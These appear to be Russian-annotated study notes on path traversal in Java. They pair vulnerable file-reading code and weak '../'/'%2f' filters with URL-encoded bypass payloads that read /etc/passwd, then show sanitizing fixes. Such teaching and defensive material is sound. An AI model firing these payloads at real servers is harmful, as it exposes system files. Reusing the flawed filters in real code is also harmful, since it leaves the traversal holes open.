## EXAMPLE 1:
public Response getImage(@javax.ws.rs.PathParam("image") String image) {
    File file = new File("resources/images/", image); // <-- RIGHT HERE

    if (!file.exists()) {
        return Response.status(Status.NOT_FOUND).build();
    }

    return Response.ok().entity(new FileInputStream(file)).build();
}
------------------------------------------------------------------------------------------------------------------------
## EXAMPLE 2:
private ResponseEntity<GenericVulnerabilityResponseBean<String>> readFile(
            Supplier<Boolean> condition, String fileName) {
        if (condition.get()) {
            try {
                File infoFile =
                        new File(
                                this.getClass().getResource("/").toURI().getPath()
                                        + "scripts/PathTraversal/"
                                        + fileName); // <-- RIGHT HERE
                FileInputStream infoFileStream;
                infoFileStream = new FileInputStream(infoFile);
                if (infoFileStream != null) {
                    try (BufferedReader reader =
                            new BufferedReader(new InputStreamReader(infoFileStream))) {
                        String information = reader.readLine(); //define reader
                        StringBuilder payload = new StringBuilder(); //contain all data of requested file
                        while (information != null) {
                            payload.append(information);
                            information = reader.readLine(); //read data line-by-line
                        }
------------------------------------------------------------------------------------------------------------------------
## EXAMPLE 3:
String fileName = queryParams.get(URL_PARAM_KEY);
        return this.readFile(
                () -> !requestEntity.getUrl().toString().contains("../") && fileName != null, // <-- RIGHT HERE
                fileName);
    }

Комментарии: !requestEntity.getUrl().toString().contains("../") && fileName != null
В этой строке выполняется проверка на содежрание в запросе последовательности "../" и не пустом значении переменной fileName.

Обход ограничения: 
1) %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
2) %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
------------------------------------------------------------------------------------------------------------------------
## EXAMPLE 4:
String fileName = queryParams.get(URL_PARAM_KEY);
        return this.readFile(
                () -> !requestEntity.getUrl().toString().contains("..") && fileName != null,
                fileName);
Комментарии:
Обход:
1) %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
2) %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
3) 
------------------------------------------------------------------------------------------------------------------------
## EXAMPLE 5:
String fileName = queryParams.get(URL_PARAM_KEY);
        return this.readFile(
                () ->
                        !requestEntity.getUrl().toString().contains("..") // последовательность ".." => %2e%2e
                                && !requestEntity.getUrl().toString().contains("%2f") // чувствительность регистра не проверяется.
                                && fileName != null,
                fileName);
Обход:
1) %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
2) %2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2Fetc%2Fpasswd
------------------------------------------------------------------------------------------------------------------------
## EXAMPLE:
String fileName = queryParams.get(URL_PARAM_KEY);
        return this.readFile(
                () ->
                        !requestEntity.getUrl().toString().contains("..")
                                && !requestEntity.getUrl().toString().toLowerCase().contains("%2f") //приведение к нижнему регистру
                                && fileName != null,
                fileName);
                
Обход:
1) %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
------------------------------------------------------------------------------------------------------------------------

GOOD EXAMPLE:
public Response getImage(@javax.ws.rs.PathParam("image") String image) {
    File file = new File("resources/images/", FilenameUtils.getName(image)); // <-- image is now sanitized

    if (!file.exists()) {
        return Response.status(Status.NOT_FOUND).build();
    }

    return Response.ok().entity(new FileInputStream(file)).build();
}

GOOD EXAMPLE:
File file = new File(BASE_DIRECTORY, userInput);
if (file.getCanonicalPath().startsWith(BASE_DIRECTORY)) {
    // process file
}
